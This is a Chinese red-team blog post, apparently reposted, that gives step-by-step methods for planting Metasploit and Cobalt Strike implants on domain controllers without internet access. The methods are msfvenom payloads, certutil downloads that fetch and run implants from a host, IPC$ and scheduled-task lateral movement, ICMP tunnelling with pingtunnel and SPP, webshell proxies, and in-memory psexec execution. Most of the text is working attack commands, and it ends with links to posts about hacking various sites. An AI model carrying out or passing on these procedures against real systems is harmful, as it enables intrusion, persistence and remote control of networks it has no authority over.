红队攻防之特殊场景上线cs和msf

wangqiang

​ 红队攻防之特殊场景上线cs和msf
Hacking黑白红     
2022-04-05 21:58
转载自https://xz.aliyun.com/t/10626

前言
网络安全的本质是懂进攻，知防守，先正向，后逆向。
一名优秀的白帽子，是不能有短板的，有的只能是很多的标准板和几块长板。

网络拓扑图

​

一、msf正向木马拿不出网域控shellmsf生成木马
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f raw -o msf1.bin
用msfvenom生成一个正向马传进去（因为无法访问外网，反向出不来），msf正向连接。

​

域控上线msf
通过域控web服务的shell进行操作，域控远程下载边界跳板机上的马
C:\ProgramData\xxxx.exe -i -c "certutil -urlcache -split -f http://xxx.xxx.xxx/msf1.exe msf1.exe

​

再通过提权工具进行执行
C:\ProgramData\xxxx.exe -i -c "msf1.exe"

​

msf通过代理开启监听

1. proxychains msfconsole
   
2. use exploit/multi/handler
   
3. set payload windows/x64/meterpreter/bind_tcp
   
4. set RHOST xxx.xxx.xxx
   
5. set lport 4444
   
6. run

复制代码

​

成功获取域控服务器的shell

​

二、主机中转监听横向上线不出网域控
设置中转监听

​

这个监听IP要内网可以通信的内网IP

​

然后生成无阶段木马(分阶段木马无法选择中转监听器)，再把木马copy到域控，设置好任务计划，启动木马之后就能够获取域控的shell了

​

ipc$+计划任务
通过net use建立IPC$连接

1. shell net use \\x.x.x.x\c$ "xxx" /user:"administrator"

复制代码

​

利用copy上传后门文件到域控

1. shell copy C:\xxx.exe \\x.x.x.x\c$

复制代码

​

运行任务，其中/i表示立即运行

1. shell schtasks /run /s x.x.x.x /u Administrator /p xxxx /tn test /i

复制代码

​

域控成功上线cs

​

三、仅ICMP出网pingtunnel上线msf&cs0. 环境搭建
WEB边界服务器是公司对外提供Web服务的机器，该机器可以通内网，同时向公网提供服务。内网同网段
存在一台Windows内网服务器域控，Web服务器可以访问该机器远程桌面。当我们拿到web边界服
务器的shell之后发现只能使用icmp协议访问公网vps（ping），所以只能用ICMP搭建通往内网的隧道，访问内网服务器域控进行后续攻击操作。

1. pingtunnel
注意，在客户端中运行一定要加noprint nolog两个参数，否则会生成大量的日志文件
由于ICMP为网络层协议，应用层防火墙无法识别，且请求包当中的数据字段被加密

2. vps服务端开启
./pingtunnel -type server       ##开启服务器模式回显0连接

​

3. 客户端开启
pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_

​

客户端本地监听9999端口 ，将监听到的连接流量通过icmpserver发送到vps的Linsten_ip:7777端口
执行后，kali有回显

​

4. msf上线
制作木马，木马的回连地址为127.0.0.1:9999,运行上线msf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=9999

​

msf开启监听

1. msfconsole
   
2. use exploit/multi/handler
   
3. set payload windows/x64/meterpreter/reverse_tcp
   
4. set lhost x.x.x.x
   
5. set lport 7777
   
6. exploit -j

复制代码

​

把木马msf.exe从蚁剑上传到靶机，运行

​

已上线msf

​

5. CS上线

1. pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server

复制代码

​

客户端本地监听9999端口 ，将监听到的连接流量通过icmpserver发送到vps的Linsten_ip:7777端口
执行后，kali有回显

​

建立监听127.0.0.1:9999和x.x.x.x:7777

​

对ICMP-127的监听生成木马cs.exe

​

传到靶机运行

​

CS监听上线

​

四、仅ICMP出网SPP上线Cobalt Strike
环境搭建
WEB边界服务器是公司对外提供Web服务的机器，该机器可以通内网，同时向公网提供服务。内网同网段存在一台Windows内网服务器
域控，Web服务器可以访问该机器远程桌面。当我们拿到web边界服务器的shell之后发现只能使用icmp协议访问公网vps（ping），所以只
能用ICMP搭建通往内网的隧道，访问内网服务器域控进行后续攻击操作。
工具：SPP
反向代理用于进入目标内网，正向代理可配合远控工具进行上线。
1. Server服务端启动

1. ./spp -type server -proto ricmp -listen 0.0.0.0

复制代码

​

2. Client客户端启动
-nolog 1不输出日志，-noprint 1不打印内

1. spp.exe -name "cs" -type proxy_client -server x.x.x.x -fromaddr :8082 -toad

复制代码

​

vps回显

​

3. 创建SPP Listeners
配置一个http beacon，Host为vps地址：x.x.x.x，监听8081端口

​

4. 创建SPP-127 Linsteners
再起一个本地监听的http beacon，Host为：127.0.0.1（这里也可以换成web跳板机的内网IP：x.x.x.x），监听本地8082

​

5. 生成无阶段木马

​

监听器选择SPP-127，进行上线

​

传到靶机运行

​

此时查看cs已上线

​

vps回显

​

将SPP-127 Linsteners的Host换成web跳板机的内网IP：x.x.x.x，监听本地8082

​

生成无阶段木马

​

监听器选择SPP-127，进行上线

​

传到靶机运行

​

此时查看cs已上线

​

vps回显

​

五、Pystinger正向代理上线不出网域控到cs工具：Pystinger
条件：

•         TCP、ICMP、DNS均不出网。
• 具有Web服务，并获得Webshell权限。
  

web边界服务器在仅ICMP出网的环境下，将ICMP出网的出站规则禁用

​

环境机器不可以ping通其他机器

​

1. 上传代理文件

•         通过Webshell上传Pystinger的对应语言的Webshell到目标机器，实现内网SOCK4代理， 确保http://x.x.x.x/pystinger/proxy.php可以访问，页面返回 UTF-8。
  

​

2. 服务端运行
参考github上Cobalt Strike多主机上线方式，上传stingger_server.exe到目标机器，然后运行
start stinger_server.exe 0.0.0.0

​

3. 客户端运行在VPS上上传stinger_client，-w proxy的url地址，执行
./stinger_client -w http://x.x.x.x/pystinger/proxy.php -l 0.0.0.0 -p 60000

​

4. 创建监听器Cobalt Strike
新建监听pystinger，多主机上线设置Host为目标机器能够与更深层机器相连的内网ip：x.x.x.x，端口为60020。
单主机上线设置Host为目标机器的ip：127.0.0.1，端口为60020，只能本主机上线

​

5. 生成木马

​

蚁剑运行木马文件

​

此时查看cs已上线

​

六、goproxy http代理上线不出网域控到cs工具：goproxy
条件：

•         TCP、ICMP、DNS均不出网。
•         具有Web服务，并获得Webshell权限。
  

web边界服务器在仅ICMP出网的环境下，将ICMP出网的出站规则禁用

​

环境机器不可以ping通其他机器

​

1. 上传proxy.exe
通过Webshell上传proxy.exe到目标机器的可读可写目录，执行以下命令在这台出网主机开启一个4444端口的HTTP服务，供后面与不出网域控通讯。
proxy.exe http -t tcp -p "0.0.0.0:4444" --daemon
netstat -ano

​

2. 创建监听器Cobalt strike
创建监听器，代理地址为不出网域控能访问到的地址，http://x.x.x.x:4444

​

3. 生成木马
有效荷载选择Windows Executable(S)，不然无法上线

​

然后利用蚁剑将该文件上传到web服务器供不出网域控下载使用。
不出网win2008执行如下命令，要写不出网win2008同层能访问到的地址，下载CS的有效载荷。
certutil -urlcache -split -f http://x.x.x.x/xxx.exe C:\xxx.exe

​

执行木马

​

成功上线cs

​

七、内存加载不出网域控上线cs条件：

•         TCP、ICMP、DNS均不出网。
•         具有Web服务，并获得Webshell权限。
  

web边界服务器在仅ICMP出网的环境下，将ICMP出网的出站规则禁用

​

环境机器不可以ping通其他机器

​

1. 拿跳板机session
首先拿到跳板机的一个Administrator权限的session

​

2. 创建监听器
创建一个Bind TCP Listener

​

3. 生成木马
生成无阶段木马

​

免杀后上传到跳板机的C:\

​

4.内存加载

1. execute-assembly C:\xxx.exe -m=psexec -i=x.x.x.x -u=administrator -p=xxxx -

复制代码

​

5.连接目标机

1. connect x.x.x.x 4444

复制代码

​

6.查看cs目标已成功上线

​

渗透实战系列
▶【渗透实战系列】|43-某次通用型漏洞挖掘思路分享
▶【渗透实战系列】|42-防范诈骗，记一次帮助粉丝渗透黑入某盘诈骗的实战
▶【渗透实战系列】|41-记一次色*情app渗透测试
▶【渗透实战系列】|40-APP渗透测试步骤（环境、代理、抓包挖洞）
▶【渗透实战系列】|39-BC渗透的常见切入点（总结）
▶【渗透实战系列】|38-对某色情直播渗透
▶【渗透实战系列】|37-6年级小学生把学校的网站给搞了！
▶【渗透实战系列】|36-一次bc推广渗透实战
▶【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透
▶【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链
▶【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP
▶【渗透实战系列】|32-FOFA寻找漏洞，绕过杀软拿下目标站
▶【渗透实战系列】|31-记一次对学校的渗透测试
▶【渗透实战系列】|30-从SQL注入渗透内网（渗透的本质就是信息搜集）
▶【渗透实战系列】|29-实战|对某勒索APP的Getshell
▶【渗透实战系列】|28-我是如何拿下BC站的服务器
▶【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试（成功获取管理员真实IP）
▶【渗透实战系列】|26一记某cms审计过程(步骤详细)
▶【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程
▶【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法
▶【渗透实战系列】|23-某菠菜网站渗透实战
▶【渗透实战系列】|22-渗透系列之打击彩票站
▶【渗透实战系列】|21一次理财杀猪盘渗透测试案例
▶【渗透实战系列】|20-渗透直播网站
▶【渗透实战系列】|19-杀猪盘渗透测试
▶【渗透实战系列】|18-手动拿学校站点 得到上万人的信息（漏洞已提交）
▶【渗透实战系列】|17-巧用fofa对目标网站进行getshell
▶【渗透实战系列】|16-裸聊APP渗透测试
▶【渗透实战系列】|15-博彩网站（APP）渗透的常见切入点
▶【渗透实战系列】|14-对诈骗（杀猪盘）网站的渗透测试
▶【渗透实战系列】|13-waf绕过拿下赌博网站
▶【渗透实战系列】|12 -渗透实战， 被骗4000花呗背后的骗局
▶【渗透实战系列】|11 - 赌博站人人得而诛之
▶【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖（修改价格提交订单）
▶【渗透实战系列】|9-对境外网站开展的一次web渗透测试（非常详细，适合打战练手）
▶【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程（详细到无语）
▶【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例
▶【渗透实战系列】|6- BC杀猪盘渗透一条龙
▶【渗透实战系列】|5-记一次内衣网站渗透测试
▶【渗透实战系列】|4-看我如何拿下BC站的服务器
▶【渗透实战系列】|3-一次简单的渗透
▶【渗透实战系列】|2-记一次后门爆破到提权实战案例
▶【渗透实战系列】|1一次对跨境赌博类APP的渗透实战（getshell并获得全部数据）
​